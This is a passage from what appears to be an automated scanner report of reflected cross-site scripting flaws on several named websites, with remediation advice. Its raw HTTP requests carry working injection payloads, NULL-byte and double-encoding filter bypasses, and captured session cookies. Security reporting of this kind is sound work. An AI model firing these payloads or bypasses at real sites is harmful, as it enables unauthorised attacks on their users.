NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /images/chat/oao/?%00fd8c7"><script>alert(1)</script>c4970a877ed=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:35 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 211 cache-control: private x-powered-by: ASP.NET Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)
1.453. https://www.bbt.com/images/chat/vcsp/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.bbt.com
Path:
/images/chat/vcsp/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ae575"><script>alert(1)</script>447eca9d97b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae575"><script>alert(1)</script>447eca9d97b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /images/chat/vcsp/?%00ae575"><script>alert(1)</script>447eca9d97b=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:39 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 212 cache-control: private x-powered-by: ASP.NET Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)
1.454. http://www.brothercake.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.brothercake.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 350fe"><script>alert(1)</script>79cd7322848 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 350fe\"><script>alert(1)</script>79cd7322848 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?350fe"><script>alert(1)</script>79cd7322848=1 HTTP/1.1 Host: www.brothercake.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:22:32 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Cache-control: private Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Set-Cookie: PHPSESSID=3f722a0b27bbf1e02a7a38b563ec2988; path=/ Connection: close Content-Type: text/html Content-Length: 20228
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the cat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 629be%2527%253balert%25281%2529%252f%252f3d8ca4cb923 was submitted in the cat parameter. This input was echoed as 629be';alert(1)//3d8ca4cb923 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the cat request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services629be%2527%253balert%25281%2529%252f%252f3d8ca4cb923&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1 Host: www.local.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cteonnt-Length: 1062 Vary: Accept-Encoding Date: Thu, 03 Feb 2011 16:25:15 GMT Connection: close Content-Length: 1062
The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14aca%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee268f1e14c1 was submitted in the cat parameter. This input was echoed as 14aca"><script>alert(1)</script>e268f1e14c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the cat request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services14aca%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee268f1e14c1&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1 Host: www.local.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cteonnt-Length: 1107 Vary: Accept-Encoding Date: Thu, 03 Feb 2011 16:25:15 GMT Connection: close Content-Length: 1107
The value of the css request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36ffb"style%3d"x%3aexpression(alert(1))"4094d82a023 was submitted in the css parameter. This input was echoed as 36ffb"style="x:expression(alert(1))"4094d82a023 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cd27'%3b570d9e9b527 was submitted in the l parameter. This input was echoed as 9cd27';570d9e9b527 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the l request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe54b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e710dcff3a6b was submitted in the l parameter. This input was echoed as fe54b"><script>alert(1)</script>710dcff3a6b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the l request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of the ord request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80630'%3bc205c1fb2ef was submitted in the ord parameter. This input was echoed as 80630';c205c1fb2ef in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ord request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5d33"style%3d"x%3aexpression(alert(1))"2ea0dbdbd7e was submitted in the ord parameter. This input was echoed as e5d33"style="x:expression(alert(1))"2ea0dbdbd7e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 142ef'%3b04d7f2c0dea was submitted in the p parameter. This input was echoed as 142ef';04d7f2c0dea in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the p request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4a96"style%3d"x%3aexpression(alert(1))"957bd801f83 was submitted in the p parameter. This input was echoed as f4a96"style="x:expression(alert(1))"957bd801f83 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the pos request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a068"style%3d"x%3aexpression(alert(1))"c701155616e was submitted in the pos parameter. This input was echoed as 6a068"style="x:expression(alert(1))"c701155616e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 795a7'%3b1996a89d919 was submitted in the pos parameter. This input was echoed as 795a7';1996a89d919 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d243c"style%3d"x%3aexpression(alert(1))"d187ae2a24b was submitted in the sz parameter. This input was echoed as d243c"style="x:expression(alert(1))"d187ae2a24b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fc55'%3b14f61c68560 was submitted in the sz parameter. This input was echoed as 9fc55';14f61c68560 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf3d9"style%3d"x%3aexpression(alert(1))"9c6370ca462 was submitted in the t parameter. This input was echoed as cf3d9"style="x:expression(alert(1))"9c6370ca462 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58aaf'%3bb65e854cbc0 was submitted in the t parameter. This input was echoed as 58aaf';b65e854cbc0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the zone request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc52c%2527%253balert%25281%2529%252f%252fd85ccbd701b was submitted in the zone parameter. This input was echoed as fc52c';alert(1)//d85ccbd701b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the zone request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100fc52c%2527%253balert%25281%2529%252f%252fd85ccbd701b HTTP/1.1 Host: www.local.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cteonnt-Length: 1062 Vary: Accept-Encoding Date: Thu, 03 Feb 2011 16:25:17 GMT Connection: close Content-Length: 1062
The value of the zone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15298%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effbd7ca082c was submitted in the zone parameter. This input was echoed as 15298"><script>alert(1)</script>ffbd7ca082c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the zone request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_1502010015298%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effbd7ca082c HTTP/1.1 Host: www.local.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cteonnt-Length: 1107 Vary: Accept-Encoding Date: Thu, 03 Feb 2011 16:25:17 GMT Connection: close Content-Length: 1107
1.472. http://www.local.com/events/category/music/dallas-tx.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.local.com
Path:
/events/category/music/dallas-tx.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c9e7'-alert(1)-'22f4ee6710f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /events/category/music/dallas-tx.aspx?8c9e7'-alert(1)-'22f4ee6710f=1 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;
1.473. http://www.local.com/events/category/performing-arts/dallas-tx.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.local.com
Path:
/events/category/performing-arts/dallas-tx.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60e4c'-alert(1)-'1c8163cafb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /events/category/performing-arts/dallas-tx.aspx?60e4c'-alert(1)-'1c8163cafb2=1 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Dallas Theatre and Comedy Eve ...[SNIP]... <a href="/events/events_map.aspx?location=dallas%2c+tx&category=performing_arts&60e4c'-alert(1)-'1c8163cafb2=1" omn_key="EES1:107:1:1118" onclick="return loc_click(this);"> ...[SNIP]...
1.474. http://www.local.com/events/category/sports/dallas-tx.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.local.com
Path:
/events/category/sports/dallas-tx.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66d6b'-alert(1)-'8080df3d42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /events/category/sports/dallas-tx.aspx?66d6b'-alert(1)-'8080df3d42=1 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d27c6"%3b652d94a4b4b was submitted in the cid parameter. This input was echoed as d27c6";652d94a4b4b in the application's response.
